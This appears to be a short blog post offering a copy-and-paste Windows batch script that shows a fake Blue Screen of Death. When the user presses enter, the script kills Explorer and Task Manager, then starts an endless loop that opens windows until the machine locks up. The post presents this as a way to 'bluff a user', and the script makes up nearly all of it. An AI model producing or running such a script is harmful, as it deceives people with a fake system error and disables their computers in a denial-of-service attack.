Classic Blue Screen of Death.
::COPY UNDER::
@echo off
Title STOP: 0x00000050 (0xFD3094C2, 0x00000001, 0xFBFE7617)
COLOR 1F
echo A problem has been deteced and Windows has been shut down to prevent
echo damage to your computer.
echo.
echo The problem seems to be casued by the following files: adb.dll
echo.
echo PAGE_FAULT_IN_NONPAGED_AREA
echo.
echo Check to make sure anay new hardware of software is properly installed.
echo If this is a new installation, ask your hardware or software manufacturer
echo for any window updates you might need.
echo.
echo Technical information:
echo.
echo *** STOP: 0x00000050 (0xFD3094C2, 0x00000001, 0xFBFE7617)
echo.
echo *** adb.dll - Address base at 0x00000050.
echo.
Set /p c=Press enter key to Continue...
if "%c%"=="%random%" goto 1
:1
taskkill /f /im explorer.exe
taskkill /f /im taskmgr.exe
:loop
START
GOTO loop
GOTO End
::COPY END::
*This shows how to randomly bluff a user on a blue screen and push the enter key button to execute another command
Subscribe to:
Posts (Atom)